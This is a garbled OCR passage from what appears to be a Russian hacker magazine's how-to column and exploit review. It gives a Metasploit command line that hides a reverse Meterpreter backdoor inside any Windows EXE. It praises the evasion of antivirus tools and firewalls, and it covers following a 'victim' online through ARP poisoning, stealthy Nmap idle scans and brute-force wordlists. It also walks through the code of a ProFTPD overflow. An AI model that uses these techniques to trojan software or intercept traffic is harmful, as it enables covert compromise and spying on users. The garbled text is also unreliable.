и еще каким-то функциям, с помощью всевозможных извратов. 
Багуэтунашли в глазофонес ЮЗ 4.1 , но работаетона и в предыдущих 
версиях. Исправление предполагается только в 4.2 
Протестить лично не было возможности — не фанат данных продуктов, 
хотя и юзабилити на высоком уровне, и Гринпис яблоки любит... Примеры 
эксплуатации баги есть на ютубе в большом количестве. Так что посмот- 
ри видео и не выпускай свой айфон из рукдо выхода патча :]. 




ЗАДАЧА: СПРЯТАТЬ БЭКДОР В ЛЮБОМ 
ЕХЕ-ФАЙЛ Е, С СОХРАНЕНИЕМ 
ФУНКЦИОНАЛА ПОСЛЕДНЕГО 



РЕШЕНИЕ: 

В одном из прошлых номеров было описано решение данной задачи, но 
тогда требовалось использовать виндовый ІЕхргезз, писать скрипт для 
последовательного запуска ехе'шников, что не оченьудобно. Ктомуже, 
тот метод никакие помогал скрыться отантивирусов. 

И вот опять скажем спасибо создателям МеіазрІоіГа ( теФзрЫГсот ]. 
Они расширили функционал тзіюпсосіе и добавили приятную воз- 
можность — объединять любой ехе-файл с любой на груз кой (рауіоасі] , 
причем сохраняя функционал исходного ехе-файла. Как раз из-за 
отсутствия сохранения функционала и приходилось извращаться. Но 
сразу к делу. За основу возьмем цір.ехе. 



. /тзПрауІоаб тпбоѵ7з/тебегргебег/геѵегзе_бср 
ЬНОЗТ=192 .168.0 .101 К | . /тзТепсобе -б ехе -б ~ -х дір . 
ехе -к -о д_Ьб101.ехе -е х86 /зЬікаба_да_паі -с 3 

Где модулю тзірауіоасі указываем создать нагрузку реверс-метерпретер 
суказанием хоста (І_Н05Т). Форматвывода — сырой(В]. Итогпопадает 
в тзіюпсосіе. Ему мы указываем зашифровать нашу нагрузку(-е х86/ 
зЫ ка!а_да_па і] трижды (-с 3]. А далее совместить ее с существующим 
ехе-файлом (-1 ехе]. Указываем, что искать ехе-файл требуется в домаш- 
ней директории (-6 ~ ], а его имя — цір.ехе (-х цір.ехе]. Самый главный 
аргумент«-к» указывает, что нагрузка будет подгружаться как отде- 
льный потов в конечном ехе-файле. И последнее — указываем итоговое 
название файла ц_Ьс! 101 .ехе (-о ц_Ьс! 101 .ехе]. 



пате: 

ЗнЬтіаэіоп 0а№: 

Сшгепі 

НезиИ: 


<Т_М10Ь*хе 

20Ш-11-22 00:3^32 1ѴТС> 

НИвІіЫ 

15>42{35.7Ч> 




1=' ■ 






1$ птаГрауІой'ЕІ иі пгіЬиз/тсЬсгргсІісг/гсѵсгзс.^ср І_Н05Т”192. 168, 0. 101 Е | 
ИЫЮІ.ехе -а хЗб/аЬі к а*д^_дз_паі -с 3 

Я [*] х86/е1і і каЬа_да_п аі зиссееіе^ ыіііі етге ЗіЁ (і ЬегагіНоп-1) 


№ 

тз^епсогіе -1 ех 1 



Пробекдорить в пару кликов любое ПО — радость 
скрипткиддисам :) 



Ехе-файл, который требуется пробекдорить, как было сказано выше, 
необходимо положить в домашнюю директорию, иначе — в стандартную 
папку стемплэйтами в М5Е. 

Каквидишь, все достаточно просто. Скрипт-киддисы очень радовались 
данной фиче, что и понятно :]. 

О результирующем файле можно сказать следующее. Во-первых, 
копируется вся информация о файле, что хорошо. Во-вторых (что не 
оченьхорошо] увеличивается размер файла. Хотя и всего на несколько 
килобайт. Если соблюдениеточного размера важно — либоубираем 
«-к», либо ручками подкромсаем излишки в ехе ' шнике. В-третьих, фун- 
кционал программы остается прежним, что является большим плюсом. 
В-четвертых, ухудшается детектирование антивирусами (1 5 из 42 на 
ѵігизіоІаГсот ]. что тоже плюс. 

Теперь есть возможность затроянить почти любое приложение под 
ѴѴіпсІоѵѵз! Аопределить, что приложение было модифицировано 
можно только по С ВС, контрольной сумме. Но это вряд ли кому-то 
придет в голову. Крометого, поменяв метод кодирования самой 
нагрузки, можно и вовсе избавить от детекта антивирусами. Но и это 
еще не все! Таку нас появляется возможность обходить брандмау- 
эры пользователей за счет того, что юзеры редко точно определяют 



► озб 
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правила для софта. Например, тот же квип по определению должен вать данную возможность, есть мало в каких фа ер воллах. 

работать по сети, что и указывается в фаерволле, но кроме того, он В общем, об этом можно былотолько мечтать :). 

будет нашим шеллом, а такие тонкие настройки, чтобы за блоки ро- 




ЗАДАЧА: ПРОСЛЕДИТЬ ЗА ПЕРЕДВИЖЕ- 
НИЯМИ ЖЕРТВЫ ПО ВЕБУ 



РЕШЕНИЕ: 

Для решения данной задачи нам потребуется, как ни странно, сниффер. 
В общем-то, следить нетрудно: включаешь сниффер и видишьссылки, 
куда человек заходит :). Ссылки -ссылками, но иногда полезно узнать, 
что это за сайт, куда заходила жертва. Можно ручками, но если сайтов 
много, то можно автоматизировать процесс, что и сделали добрые 
люди. Я говорю о плагине гето1:е_Ьгоѵѵ5егдля ЕНегсар-МѲ [ еНегсар. 
зоигсеіогде.пеі ). Да-да. этот чудо-сниффер! 

Последовательность действий следующая. 

Сначала, подредактируем еНегсар.сопН 



1 ) Редактируем конфиг : 
папо /ебс/еббег . сопі: 

2) Заменяем ес_иіб, ес_діс! на: 
ес_иіс! = О 

ес_діб = О 

3) Заменяем значение гетобе_Ъгоѵ\гзег на: 
гетобе_Ъгомзег = " іігеіох Ъ.ббр : / /%Ьюзб%иг1 " 

Третий шаг можно оставить, нотогда перед запуском плагина требуется 
запустить сам браузер, а в данном варианте он стартует сам. 

Далее пример с использованием гуи-версии ЕіТегсар’а: 



1) Запускаем еббегсар: 

Еббегсар -С 

2) ЗпіТ^ бпіііеб зпііііпд; 

3) РІидіпз -> Мападе бйе ріидіпз; 

4) Двойной клик на гешоСе_Ьгоѵ^зег ; 

5) Далее запускаем сниффер: 

Збагб Збагб зпііііпд 

Кактолько в трафике появиться запрос к какому-то веб-серверу от 
жертвы — твой браузер откроется на той же странице. Чтобы «было что 
снифить», можно сделать агр-роізоп. Для этого: 



5*аП Іагдеіз уіеѵѵ М«*гп ^оддіпд Иеір 



но$і и$* м 


Ріидіпз й | 


1 


ір АсМге$$ 


|МАС АсМге$$ 


Ое$сгірІіоп 



192.168.0. 1 1С:АР:Р7:1Е:09:39 

192.168.0. 101 00:11:09:98А7:6Е 



Веіеіе Нові I АсМ Іо Тагдві 1 



- 



АсІсІ Іо Тагдві 2 



АКР роі$опег (ІеасгіѵаІеЩ 
ЧЕ-АКРіпд іЬв ѵіс1ігп5... 

Но$1 192.168.0.1 а<МесЙо ТАЯОЕТ1 
Чозі 192.168.0.105 а<Ме^ Іо ТАКСЕТ2 
Асііѵаііпд гетоіе_Ьго*$ег ріидіп... 



АЯР роізопіпд ѵісіітз: 



ОКОУР 1 : 192.168.0.1 1САР:Р7:1Е:09:39 

СКОСІ? 2 : 192.168.0.105 00:16:03^2 А5:09 
ЗІаПіпд бпЖес! $пі№пд... 

Старый добрый агр-роізоп в СТК-ЕИегсар-Ы© 



1) сканируем сетку : 

НозСз -> Зсап бог ЬозСз 

2) добавляем шлюз жертвы: 

Нозбз Нозб Іізб ІР_гоибег Абб Со Т1 

3) добавляем жертв (у) : 

Нозбз -> Нозб ІізС -> ІРз -> Абб Со Т2 

4) запускаем агр-роізоп: 

Мібгп -> Агр роізопіпд -> Зпібб гетобе соппесбіоп 



Также можно работать и с рсар-логами трафика, используя ісргеріау: 
бсргеріау -і ебЬО ЫаЬ_Ыа1і . рсар 



Теперь о недостатках. Во-первых, плагин хреново работаете интерак- 
тивными сайтами, что и логично, есть проблемы с аутентификациями 
на сайтах. Во-вторых, открывается каждая из ссылок в новой вкладке, 
т.е. и всякие, никому не нужные запросы кбаннерным сетям, но это 
решабельно. И, к сожалению, данный плагин не работаетв ѴѴіп версии 
Еиегсар-ІЧО. 




ЗАДАЧА: СГЕНЕРИРОВАТЬ 
ТСР/ІР ПАКЕТЫ 



РЕШЕНИЕ: 

Изучая что-либо, даже не важно, что именно, правильно и даже важ- 
но попробовать самому, потрогать своими руками. Но это и понятно: и 
ясности больше, и экспа быстрее набирается. И, наверное, всем читателя 
нашего журнала приходилось иметь дело со стеком протоколов ТСР/ІР, 
сего изучением (будьто в институте или какхобби]. И, наверное, каждый 
напрягался по поводутого, что информация вроде и простая, но очень 
теоретическая. Никаккней не прикоснуться. Есть, конечно, тулзы в стиле 
Ьріпд'а, но это уже что-то профессиональное, для людей с пониманием. 
Хорошее подспорье здесь, конечно, сниффер на подобиеѴѴігезбагк'а. Все 
достаточно наглядно и многиетонкости становятся понятны :). Но находка 
на диске прошлого номера Хакера меня оченьпорадовала. И я не могу не 
поделиться, и не обратить на нее вашего внимания, зная как много студен- 
тов читаютжурнал, скольким она может быть полезна. Имя ей — СоІазоЙ 
Раскеі ВиіШегІ соІазоК.сопп/раскеі ЬиіШег ). Какясно из названия — это 
генератор пакетов. 



Бесплатный, под ѴѴіпсІоѵѵз. А главное — с интуитивно понятным, нагляд- 
ным интерфейсом. 

Создавать можно любые пакеты, даже самые кривые, но отображение 
структуры заголовков возможно только для протоколов ЕіЬегпеі, АРР, ІР, 
ТСР, ІЮР Что важно, хоть и логично, полученные пакты можно отправлять 
в просторы Сети :). 



Быстро и просто создаем и изменяем ТСР/ІР пакеты 
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взлом 



Чтобы не создавать пакеты из ничего, чтобы видеть ответы на посылаемые 
пакеты, параллельно желательно запустить ѴѴігезбагк. Кстати, СоІазоЙ: 
Раскеі ВиіИег поддерживает импорт и экспорт сар-файлов. У ѴѴігезбагк по 
стандарту рсар-формат, но существенной разницы между сар и рсар нет, 
так что можно просто переименовать файл. 

Созданные пакеты группируются в левом списке, откуда их либо все, либо 
частично можно отправлять. Так что можно попробовать осуществить пол- 
ное ТСР «рукопожатие» (хотя осуществить его непросто из-за рандомных 



значений в заголовках], протестить способы активного ОС-детекта и много 
чего еще. 

Ну, и в дополнение к этому — СоІазоТС Раскеі Ріауег. Названиетоже 
говорящее само за себя. По сути, это аналогзнаменитомуісргеріау, только 
гуишный, под винду и несколько меньшими возможностями. Пользуемся 
на здоровье, когда требуется повторить старый трафик. 

Также обидно, что отсутствуют консольные версии программ. 




ЗАДАЧА:ФИЛЬТРАЦИЯ ТРАФИКА 
ПРИ СНИФЕ ТСРОІІМР'ОМ 



РЕШЕНИЕ: 

Продолжутему использования снифферов. 

Иногда требуется сэкономить ресурсы на компьютере, что бывает не- 
обходимо, если делаешь это через жертву, либо, если снифишьдолго, и 
опять же появляется проблема в объемахлогов, либо для общего удобс- 
тва. Делается это с помощью фильтров для сниффера. Так как Арбитр 
является нерушимой классикой в деле прослушки каналов, то правила 
фильтров кней работают и с большей частью другого аналогичного ПО. 
Для Арбитр фильтр пишется после аргументов, в ѴѴігеЗЬагк'е есть 
Саріиге Ріііег, в котором и прописывается аналогичный фильтр. Правила 
описывать не буду — на примере все станетясно. 



Ссрсіитр -от РезС .рсар -і еСЪ.0 ГюзС 192 .168.0 .101 апсі Сер 
рогСгапде 1-1024 

Где -і еіЬО — интерфейс для прослушивания; 

-ѵѵіезі.рсар — имя файла, куда сохранится все что наснифили; 

ЬозП 92.168.0.101 — лог, только приходящих/уходящих пакетов с 
192.168.0.101; 



апсі, ог — совмещение правил; Іср рогігапде 1-1024 — логтолько прото- 
кола Іср по диапазону портов. 

Ссрсіитр -от СезС.рсар -з 1550 пеС 192.168 апсі поС агр 

Где -з 1550 — размер пакета, который сохранится в логе (стандарт 
Арбитра — 96 байт); 

пеі 192.168 — лог, только приходящих/уходящих пакетов с подсетки 
192.168; 

подагр — нелогировать АРР-пакеты. 

Ссрсіитр -от СезС .рсар зге 192 . 168 . 0 . 101 апсі ( Сер рогС 
31337 ог исір \ ( 4523 ог 5543 \) ) 

Здесь снифятся только пакеты, исходящие от 192.168.0.101 .только на 
порт31337 протоколу ТСР, либо 4523, 5543 порты протокола ІЮР. 

Думаю, идея ясна. Аналогичным образом можноограничиватьполюбым 
протоколам, портам, ІР-, МАС-адресам ит.д. Здесь важно не запутаться в 
логике действия ОР, АІ\Ю и І\І0Т. Кстати, можно использовать вместо них 
символы II, &&, ! соответственно. Крометого, есть возможности по фильтра- 
ции на основании более глубоких «тонкостей» в значении полей. Например, 
пофильтровать поустановленному биту ОопТ Ггадтепі в ІР-заголовке, или 
поЗѴІЧ-флагувТСР Ноэтоужедля гурманов и извращенцев :). 




ЗАДАЧА: СКРЫТОЕ СКАНИРОВАНИЕ 
ПОРТОВ ЫМАР'ОМ 



РЕШЕНИЕ: 

Теперь к классике. Старой, доброй, светлой :]. 

Перед тем, как взламывать какую-то сетку/хост, требуется сначала провести 
разведку, собрать информацию. Одно из важнейших дел — достать информа- 
цию о запущенных сервисах на хосте. Сервисы привязаны к портам, а потому 
сканирование портов — важно. Но чтобы нас не засекли затаким «благим» 
делом (оно не особо легально], ведь сделать это не трудно, та к как наш ІР-ад- 
рес в каждом отправляемом пакете, — требуется мутить всякие штуки. 

Одним из достаточно скрытных, но при этом простых методов, является 
ібіе-сканирование, которое реализовано в КІтар’е ( ітар.огд ]. Идея Апбгег’а 
еще от 1998 года и основана на наблюдении, что во многих ОС (и устройствах] 
имеется статическая инкрементация поля Ю в ІРзаголовкед.е. сколько хост 
отправил пакетов в сеть, на столько и увеличилосьзначение ІРЮ. 

На практике это выглядит следующим образом. 

Мы находим зомби-хостна просторах сети. Зомби-хост — это хосте миниму- 
мом трафика, т.е. «не общающийся» ни с кем по сети в данный момент. «Нет 
общения» — нет оправленных пакетов, а потому ІРЮ не меняется. Коннек- 
тимся к нему и узнаем значение ІРЮ. 

Далее отправляем ТС РЗѴІЧ -запрос на какой-нибудь порт нашей жертве от 
ІР зомби. Если порт открыт, то жертва отвечаетЗУЫ-АСК. Когда 5ѴЫ-АСК 
ТСР-пакет приходит нашему зомби, то он по стандарту генерирует РЗТ-пакет 
в ответ, тем самымувеличиваясвой ІРЮ. 

Если порту жертвы закрыт, то генерируется РЗТ-пакет, который отправля- 
ется зомби. По стандарту на РЗТ-пакет не требуется отвечать, а потому не 
происходитизменения ІРЮузомби. Если порт фильтруется брандмауэром 
у жертвы, то ответа на 5УІ\І -запрос никакого не последует, а потому ІРЮ, 
аналогично с предыдущим вариантом, у зомби не изменится. Далее мы 
посылаемзапрос уже зомби и анализируемзначение ІРЮ вответе. Если оно 



изменилось (без учета нашего запроса зомби], то порт открыт, если нет— порт 
закрыт. Более подробное описание и показательный рисунок ищи на птар. 
огд/Ьоок/ісНезсап.ЫтІ . 

Таким образом, мы не посылаем ни одного пакета нашей жертве. 

Что важно, данный метод, в отличие от многих других, можно использовать 
и на просторах Интернета. 

Самой важной задачей здесь является нахождения такого вотзомби, 
хоста без трафика. Таккаксостороннимтрафиком мы несможем просле- 
дитьза изменениями ІРЮ, реально машину найти не проблема. 

Чтобы узнать подходитли данный хост в виде зомбика, можно натравить 
на него ІЧтар с портсканом или ОС-детектом с выводом дополнительной 
информации (-ѵ). И, если там будет строчка «ІР Ю Зециепсе Сепегабоп: 
ІпсгетепІаКто хост нам подходит. Протестить желательно пару раз. Са- 
михзомбиковжелательно братьлибо поближе к себе, либо кжертве.для 
уменьшения количества возможных ложных срабатываний. Также есть 
скрипт для І\І5Е, который чекает пригодность хоста ( птар.огд/пзесіос/ 
зсгіріз/ірісІзед.ЫппІ ]. 

Пример. 

Определяем пригодность: 

птар -ѵ 192 . 168 . 0 . 105 

Где 192.168.0.105 — ІРпотенциальногозомбика. 

Запускаем ісНе-сканирование: 

птар -зі 192.168.0.105 -РЫ -ѵ 192.168.0.1 

Где -51 192.168.0.105 — указываем ІР-зомби; 

-РИ — отключаем пингжертвы, передсканированием.для пущей конфиден- 
циальности; 

-ѵ— вывод подробной информации при сканировании; 

192.168.0.1 — жертва. 
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Мо, ^ | ТЙП09 


5оигс& 


Оезйпайоп 


РгоЬосоІ 



ІпРо 



1 22:33 :47, 138668 192,168*0*103 



192*168*0*105 



3 22:33 :47*174607 192*163,0.103 192,168,0.105 



60204 > МгЕр [5ѴМ » АПК] 5&д°1368359585 Аек*284 5 778546 Ціп-3072 Ьепдр И 
“ТСР ѲО 2оТТ АС К ] 3 е д ”Гб 33 595 ^ 

60207 > И±*р [5УМ , АОД 5&д=13б8359538 Аек=2345 776546 Цщ=4096 Ьеп-О М 




13 22:33:47*301950 

14 22:33 :47.354921 

15 22:33 :47.410919 

16 22:33 :47*472529 



192,168, ОЛ 
192. 168.0.1 
192. 168.0.1 
192*168*0*1 



17 22:33 :47*784356 192* 168*0* 103 



19 22:33 :47*784779 

20 22:33:47*784898 

21 22:33:47,785008 

22 22:33:47.785119 

23 22:33 :47*785227 

24 22:33 :47*785335 

25 22:33 :47*785443 

26 22:33 :47* 785553 

27 22:33 :47* 785662 
?« 77:31:47.785769 



192*168,0,105 
192, 168,0, 105 

192.168.0. 105 

192.168.0. 105 
192.168.0.105 
192,168*0*105 
192*168*0*105 
192.168*0*105 
192.168.0*105 
іч? г ійЯ т 0.106 



192.168.0. 105 

192.163.0. 105 

192.168.0. 105 
192*168*0*105 
192*168*0*10 5 

19^1™й1 

192.163.0. 1 

192. 163.0. 1 

192.163.0. 1 
192.163*0.1 
192*168*0*1 
192*168*0*1 
19 31 
19 

19 



60203 > КЕ-Ер [5Ѵ№ * АСК] 5еч-1368359539 Аск-2845 778546 Иіп-4096 1_еп=0 М 
Иі^ір 
ЬХХр 



60203 
60203 > ИШ 
60203 > К±-Ер 
60203 > (тѣір 
60410 > К«р 



[5ѴМ, АС К] 
[5ѴЩ АС К] 
[5ѴМ , АС К] 
[5ѴМ * АС К] 
[5ѴМ, АС К] 



5есі-і3683595 85 Аск ^2 84 5 7 785 46 Ѵіп-3072 І_5П=Ю М 
5 еч -13 683 5 95 86 Аск-284 5 778546 'л'іг-1024 Іеп-0 М 
5ед=13б83595 87 Аск =2 34 5 778546 ИІп=2043 ЬегиО М 
559=1368359588 Аск=2845 778546 ^Іг=2043 1еп=0 М 
5 59=4169616413 Аск-5 165 64450 Ыіп-3072 Іеп-0 М5 



Міір > іпісгогоІЧ-еІг [5УМ] 559=4051793838 Міч=1024 І_6П=0 0155=1460 
Н*1гр і МЛр-*И: [5ѴМ] 5 еч=4051798838 Ѵіг=4096 І_5П=0 0155=1460 
И«р э Иир [5ѴН] 559=4051798833 Ѵіп=2048 1.69=0 №55=1460 
ЬШ э ігпар$ [5ѴЮ $59=4051798838 Міп-3072 1_еп=0 И55-1460 
ИІг-Ср > йісіі ~*ср-1 [5УМ] 559=4051798838 Міп=3072 1_еп=0 М55=14бО 
> пе’ЬЬіов-взп [5ѴН] 559=4051798838 Мі п-3072 1еп=0 И55=1460 
Н«р > зыпгрс [5ѴН] 5 ед =405 1 79883 8 Ыіп-2048 1_ел-0 М55-1460 



" п '"СІЭ 



! Ргате 12 (60 ЬуЕе§ оп міге, 60 ЬуЕег саріип 
I Е-Екйгпеі II, 5 гс : Ыі 5*поп_е2 :а5 :09 (00:16 ід. 
] ІгЛегпеЪ Рго-Ьосоі, 5гс: 192*168.0.105 (192*: 
Ѵегзіоп: 4 

Неагіег Іепд-Ек: 20 ЬуЕез 
Щ Оі'б-Регеп^і а-ЕесГ Зегѵісев Ріеісі: 0x00 (05СР 
Тоіаі ипд*Іі: 40 

Иеліі^іоп: аЩЩ 

щ Иадз: 0x00 

РгадпібггЕ о^эе*: О 
Тіте Іо Ііѵе: 128 
Р го 1с со 1 : ТСР (0x06) 

Ѳ Неасіег сИескзит: 0х248е [соггесЬ] 

5оигсе: 192 Л 68. О* 105 (192.168.0.105) 
Оезіі паііоп : 192*168*0.103 (192*168*0*103 






ід [- - бь±н - щГЕЗВ <2^ 



3555 І 0 П 6 (НЕ VI еч Вооктягка ЗеШпдБ Неір 



гооІ^Ьѣ: # птар - зі 192. 168. О. 105 -РМ 192.168.0.1 

Зіагііпд Мтар 5.00 ( Ыір : //птар . огд ) а! 2010-11-20 22:33 М5К 

іЛе зсап изіпд готЬіе 192.168.0.105 (192.168.0.105:80); Сіазз: ХлсгетепТа! 

ІпІегезТіпд рог-Ез оп Ігее (192.168.0.1): 

N0* еЬоыгы 997 сіоаесі | іі Ііегегі рогіз 

РОРГГ 5ТАТЕ ЗЕВѴІСЕ 

53/1ср ореп сіотаіп 

80/Іср ореп ЬіТр 

49 152/ 1с р ореп ипкпоѵп 

МАС Шгеъзі 1С: АР : Р7 : 1Е : 09 : 39 (Упкпоѵп) 

Мтар сІопе: 1 ІР асІсЗгезз (1 Ьозі ир) эсаппесІ іи 8.61 эесопсІЕ 



ІсІІе-сканирование Ытар'ом и лог из ѴѴігезНагк'а 



Кроме скрытия своего ІР-адреса, данный метод может применяться еще в 
нескольких ситуациях. Во-первых, для выяснения межхостовых взаимоотно- 
шений, т.е. когда доступ кжертве разрешен только с определенных адресов. 



Во-вторых, как метод обхода ЮБ/фаерволлов, когда мы проводимсканиро- 
вание хоста с нескольких зомби машин. Тем самым мы добавляем распреде- 
ленность сканированию, затрудняя фаерволлам его блокировку. 



ЗАДАЧАгСГЕНЕРИРОВАТЬ СЛОВАРЬ ДЛЯ 
БРУТФОРСА 

РЕШЕНИЕ: 

Я уже несколько раз писал в данной рубрике отом, где можно взять 
словари для брутфорса или с помощью чего их можно сгенерировать. Но 
не могу не написатьо прелестной находке. Имя ей — 1517 (какое красивое 
имя :]. Взять можнотѵт — собе.доодІе.сот/р/151 7 . Данная тѵлза включает 
в себя очень широкие возможности при быстрой и качественной работе. 

Смотри СЭМ: 

1) Генерирует вордлисты, доставая слова из файлов все- 
возможных типов . 

2) Генерирует вордлисты, основываясь на веб-сайтах. 

3 ) Создание стандартных вордлистов . 

4) Мутация вордлистов бу кв о -цифрами, личными префиксо- 
суффиксами . 

5) Поддержка иностранных алфавитов (хотя отображение их 
заметно страдает) . 

5) Конвертация, фильтры вордлистов . 

Программа сделана под ѴѴіп и, понятное дело, имеет гуи-интерфейс. Хотя 
по сути своей, тулза ничего чрезвычайно нового и оригинального собой 
не представляет. Но хорошо ведь, когда в одном месте все необходимое 
собрано. Да и поколению, не дружащему с консолью, придется явно по 
душе ;]. 

Примеры приводить не буду — все и так интуитивно понятно, □с Достойный вордлист-генератор под ѴЛ/іпсІоѵѵз 
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■ ■ Никита Тараканов (СІ5Б РезеагсЬ Теат, МІр:/ЛѵѵіІІег.сот/МТагакапоѵ) 



ЕХРЮІТ5 

РЕѴІЕѴѴ 




Г5 


“1 





ОБЗОР . 
ЭКСПЛОИТОВ 



Разбираем 

свежие 

уязвимости 




к. 




УДАЛИМ ЭЕ ВЫПОЛНЕНИЕ КОДА 
В РРОРТРО 

Ноябрь выдался хорошим месяцем поудалённым эксплойтам для 
очень популярного РТР сервера РгоНрсІ. Что примечательно, одна 
уязвимость была продана анонимным исследователем компании 
Ю\[Іего йау ІпібаНѵе), и была исправлена втечении 40 дней. Однако, 
из просмотра коммитов, становится ясно, что уязвимость жила целых 
2 года ! 

Вторая же уязвимость была опубликована в свежем 67-м выпуске 
легендарного е- 2 Іпе'а рЬгаск. Обнаруженные уязвимости позволяют 
удаленному пользователю обойти некоторые ограничения безопас- 
ности и скомпрометировать целевую систему. 

РгоНрсІ ѵегзіоп < 1 .3.3с геіеазесі. 

Ссылки на багтрек: 

• Ьидз.ргоНрсІ.огд/зЬоѵѵ Ьид.сді?іс1=3521 ; 

• Ьидз.ргоНрсІ.огд/зЬоѵѵ Ьид.сді?ісІ=351 9 : 

• хог[.ѵѵогфге55.сот/201 0/1 1/1 5/сѵе-201 0-4221 - ргоіірсі-іеіпеі іас- 
гетоІе-зІаск-оѵегНоѵѵ/ . 

ЕШЗ 

Первая уязвимость существует из-за логической ошибки в 
функции рг_пеІіо_1:еІ.пеІ_деЫ) в файле згс/пеііо.с при обработке 
пользовательских данных, содержащих Теіпеі ІАС (Іпіегргеі Аз 
СоплтапсІ] езсаре-последовательность. Используя баг, хакер 
может с помощью специально сформированных данных, от- 
правленных РТР или ЕТР5 службе, вызвать переполнение стека 
и выполнить произвольный код в системе. Еще одна брешь 
существует из-за ошибки проверки входных данных в модуле 
тосІ_5І1:е_ппІ5С. Злоумышленник может создать и удалить дирек- 
тории, символические ссылки или изменить файлы за пределами 
доступной на запись директории. Для успешной эксплуатации 
бага приложение должно быть с компилировано с поддержкой 
модуля тосі_5ІІе_ппІ5С и атакующий должен иметь привилегии на 
запись в директорию. 

ДОііЫѴі 

Рассмотрим подробно одну из найденныхуязвимостей. Пойдем в 
функцию рг_пеІіо_ІеІпеІ_деЫ), которая находится в згс/пеііо.с: 

сЬ_аг *рг_пеЕіо_Ье 1 пеЦ_деЕз (сЬаг *Ьи:Е # зІ 2 е_Ь ЬиОеп, 
рг_пеЕіо_зЕгеат_Е *іп_пзЕгт, 
рг_пеЕіо_зЕгеат_Е *оиЕ_пзЕгт) 

{ 

сЬаг *Ър = Ъиі:; 
ипзідпесі сНаг ср; 



іпЕ ЕогеасЦ Напс 11 е_іас = ТКЕТЕ, заѵ^_пеѵ^ 1 іпе = РАЬЗЕ; 
рг_ЬиЕЕег_Е *рЬиЕ = ШЬЬ; 

ІЕ (ЬиЕІеп == 0 ) { 
еггпо = ЕІШ/АЬ; 
геЕигп ШЬЬ ; 

} 



ЬиЕІеп-- ; 

і € ( іп_пзЕгт->зЕгт_Ьи:Е) 

рЬиі: = іп_пзЦгт->зЦгш_Ьи^ ; 

еізе 

рЬиі: = пеЕіо_Ьи:І:Еег_а11ос ( іп_пзЕгт) ; 

иШе (ЬиЕІеп) { 

ѵйіііе (ЬиЕІеп && Еогеасі > 0 && 

*рЬи:Е->сиггепЦ != 'Хп' && Еогеасі--) { 
ср = *рЬиЕ->сиггепЕ++ ; 
рЬиЕ->гетаіпіпд++ ; 



сІеЕаиІЕ : 

*Ър++ = ТЕЬКЕТ_ІАС; 

ЬиЕІеп--; < декремент длины 

Ее 1 пеЕ_тос 1 е = 0 ; 

Ьгеак; 

} 



*Ьр+ + = ср; 

ЪиЕІеп-- ; < второй декремент во внешнем цикле 

} 



ргорег 1 у_ЦегшіпаЦесі_ргеѵ_сотшап (1 = ТКЕТЕ; 

*Ьр = '\0 Г ; 
геЕигп ЪиЕ; 

} 

Обрати внимание на то, что все будетхорошо если ЬиНеп не достигнет 
нуля. Как видишь, на каждой успешной итерации ЬиНеп уменьшает- 
ся, но если нам удастся в «ТЕІ_І\ІЕТ_ІАС» ЬиНеп установить в 1, то она 
будет декрементирована дважды! Это сделает ЬиНеп огромным по- 
ложительным числом, что вызовет копирование байт до тех пор, пока 
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Небольшой список опубликованных уязвимостей в антивирусных продуктах 



РІШеІеазеСопІгех* 

РІШеІеэзеСопІехІ сіесгетегсіз іЬе ге^егепсе соипі оп а сопіехі 
тою 

ГііЯеІеааеСоп^ек : і 
іи ргьт_сдаткхг 
) ; 

Рагащеіек 

Сопіехі 

Роіпіег іо іЬе сопіехі, Мизі Ье а ѵаіігі роіпіег іо а сопіехі оЬіесі Рог а ѵоіите, іозіапса, зігеат, ог зігеат Ьапсііе. ТЫ 5 рагатеіег із гечиігегі апсі сэппоі Ье ШІЛ_. 



Справка о функции РНКеІеазеСоггіехІ' 



он не выйдет из строя или не будет достигнуто некоторого условия, 
что прервет цикл. Классический пример іпіегдег оѵегбіоѵѵ, который 
приводит к Ьи^ег оѵегііоѵѵ. 

Посмотри ссылку на очень красивый эксплойт от Кіпдсоре: ехріоіі:- 
бЬ.сот/ехрІоіІз/1 5449 . Данный сплойт поддерживает много ОС: 
РгееВБО, ипих:ВеЬиап,51)5Е,СепЮ5. В ОеЬіап Бциееге эксплойт 
немного использует ВОР для передачи выполняемых данных в рооі 
ЬіЖег (стб_гес «гез» в «рг_стсІ_геасІ»], в ІІЬипІи использует РОР по 
полной программе: для отображения в память ПѴѴХ памяти, копиро- 
вания не больших зІиЬ ' овтуда и их выполнение. 

Кстати, многие дистрибутивы Ыпих были скомпилированы сзащитой 
(зІаскзтазЫпд ргоіесбоп] от атак. Хоть эта защита снижаетверо- 
ятность проведения атаки, но не блокируетее полностью! Соокіе в 
ІІЬипІи имеет 24-битэнтропии, что снижаетэффективность и делает 
невозможным 100% эксплуатацию уязвимости. 



50ШТІ0М 



В новой версии рго^рсі- 1 .3.3с было выпущено исправление, а имен- 
но, добавлена проверка нулевого значения переменной ЬіЖеп, что 
сделало приложение неэксплуатабельным :). 



ѵѵе шгоСе ІАС іпСо Цііе оиСриС ЪиІІег, апсі сіесгетепііесі 
ЪиІІеп (зІ2е оі Ыіе оиСриС ЪиІІег гетаіпіпд) . ТЬиз ѵіе 
+ пеесі Со скеск кеге ІР ЪиІІеп із 2его, Ъеіоге Цгуіпд Со 
(іесгешепЦ ЪиІІеп адаіп (апсі роззіЫу ипсіегііісжіпд Цке 
ЪиІІеп зІ2е_Ь сіака Суре) . 

+ */ 

+ іі (Ъикіеп == 0 ) { 

+ Ьгеак; 

+ ) 

*Ър++ = ср; 

Ъикіеп-- ; 



ВЫПОЛНЕНИЕ ПРОИЗВОЛЬНОГО 
КОДА В ІМТЕРЫЕТ ЕХРЮРЕР (СѴЕ- 
2010 - 3962 ) 

Іпіегпеі Ехріогег 6/7/8 




згс/пекіо . с 



+ /* Іп кке зікиакіоп мке ге кке ргеѵіоиз Ъуке маз ап ІАС, 



ЕШЗ 

Фактэксплуатации данной уязвимости обнаружили исследователи 
из ѴѴеЬзепзе Бесигііу І_аЬз. Уязвимость связана стем, что ІЕ выде- 
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ЕХРЮІТЗ 






РЕѴІЕѴѴ 




ЕХРЮІТЗ 

РЕѴІЕѴѴ 












Ш> д 

Ассезз ѵіоіагіоп - сосіе с0000005 ( ! ! ! зесопсі сііапсе ! ! !) 

еах=414І413й еЬх=сООООООсІ есх=±±±±±±±± есіх=83 170160 езі=41414119 егіі=с000000с1 
еір=±97с9075 езр=±09б2ЬЬЗ еЬр=±0962ЬЪе іор1=0 пѵ ир еі пд пг па ре пс 

сз=0003 зз=0010 йз=0023 ез=0023 ±3=0030 дз=0000 е±1=00010286 

